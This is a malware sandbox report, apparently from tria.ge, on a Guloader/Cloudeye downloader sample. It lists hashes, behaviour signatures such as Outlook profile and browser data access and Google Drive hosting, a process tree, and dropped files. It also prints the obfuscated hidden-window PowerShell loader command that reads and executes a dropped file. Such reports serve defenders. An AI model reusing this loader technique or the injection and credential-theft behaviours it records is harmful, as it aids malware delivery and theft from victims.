Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
145s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
10/07/2024, 21:53
Static task
static1
Behavioral task
behavioral1
Sample
43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe
Resource
win10v2004-20240709-en
General
-
Target
43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe
-
Size
407KB
-
MD5
d0306eecb1329a6d25e3859eb094a246
-
SHA1
47f618e7478d4e14f7f072cd3bc7aa6b95310113
-
SHA256
43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5
-
SHA512
f352abd59ab5f0f74c562aa663038474e2039b8a4b5b3121cdf2d082da778953720483849a92298f6ee46fb82d51232e4776eff817fbb58526b7c127581a04fc
-
SSDEEP
12288:vGjaO1u7KkTfCqYaU6n9MepLgHCV8kEm87W:vGb+KkTfCBaFn9dLgqlEm8C
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2332 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 2332 powershell.exe 2840 Ancome.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Ancome.exe Key opened \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Ancome.exe Key opened \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Ancome.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 drive.google.com 5 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 2840 Ancome.exe 2840 Ancome.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2332 powershell.exe 2840 Ancome.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2332 set thread context of 2840 2332 powershell.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x000d000000012281-23.dat nsis_installer_1 behavioral1/files/0x000d000000012281-23.dat nsis_installer_2 -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2332 powershell.exe 2332 powershell.exe 2332 powershell.exe 2332 powershell.exe 2332 powershell.exe 2332 powershell.exe 2332 powershell.exe 2332 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2332 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2332 powershell.exe Token: SeDebugPrivilege 2840 Ancome.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2264 wrote to memory of 2332 2264 43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe 31 PID 2264 wrote to memory of 2332 2264 43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe 31 PID 2264 wrote to memory of 2332 2264 43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe 31 PID 2264 wrote to memory of 2332 2264 43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe 31 PID 2332 wrote to memory of 2840 2332 powershell.exe 34 PID 2332 wrote to memory of 2840 2332 powershell.exe 34 PID 2332 wrote to memory of 2840 2332 powershell.exe 34 PID 2332 wrote to memory of 2840 2332 powershell.exe 34 PID 2332 wrote to memory of 2840 2332 powershell.exe 34 PID 2332 wrote to memory of 2840 2332 powershell.exe 34 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Ancome.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Ancome.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe"C:\Users\Admin\AppData\Local\Temp\43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Recontest=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Leptosomic26.Udt';$Genskabninger=$Recontest.SubString(51485,3);.$Genskabninger($Recontest)"2⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Users\Admin\AppData\Local\Temp\Ancome.exe"C:\Users\Admin\AppData\Local\Temp\Ancome.exe"3⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2840
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3502430532-24693940-2469786940-1000\0f5007522459c86e95ffcc62f32308f1_f42ec065-7b23-4f0f-9aa0-d097eed4c26e
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3502430532-24693940-2469786940-1000\0f5007522459c86e95ffcc62f32308f1_f42ec065-7b23-4f0f-9aa0-d097eed4c26e
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
Filesize
68KB
MD5dbdaecdd9f7e16dc10dae658d357276c
SHA1542144045872fd985ba68c035d703c526e03527f
SHA256e974c25440e143e007ca3b5bed2d5769e8af0218b3417e1f8d78830de4c1e697
SHA512d71e47d497921b191410567997765329c1906d4ec88a3283b21653913b60fb08dd8523744b8add57f0ff18db3031d195fb63ac13ad268fec6eee4baf5050a466
-
Filesize
351KB
MD5c8be19808a52e77d42070331b31dc56e
SHA1d4cf31931b64d7dd935cb8ed5c0fba9999bd53c8
SHA25676d5da3613cd82da47fb5b91e01b24726380757c2b415e69df91a67fa2ee6a74
SHA51211f457c25dd24c323f213f810e32bdd5a468cf5f79e306c3b34d91d0fcbc04cea225003e0e00782a28a036f40d9e226b863686f8f3285f81eadabcfc637b9369
-
Filesize
407KB
MD5d0306eecb1329a6d25e3859eb094a246
SHA147f618e7478d4e14f7f072cd3bc7aa6b95310113
SHA25643322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5
SHA512f352abd59ab5f0f74c562aa663038474e2039b8a4b5b3121cdf2d082da778953720483849a92298f6ee46fb82d51232e4776eff817fbb58526b7c127581a04fc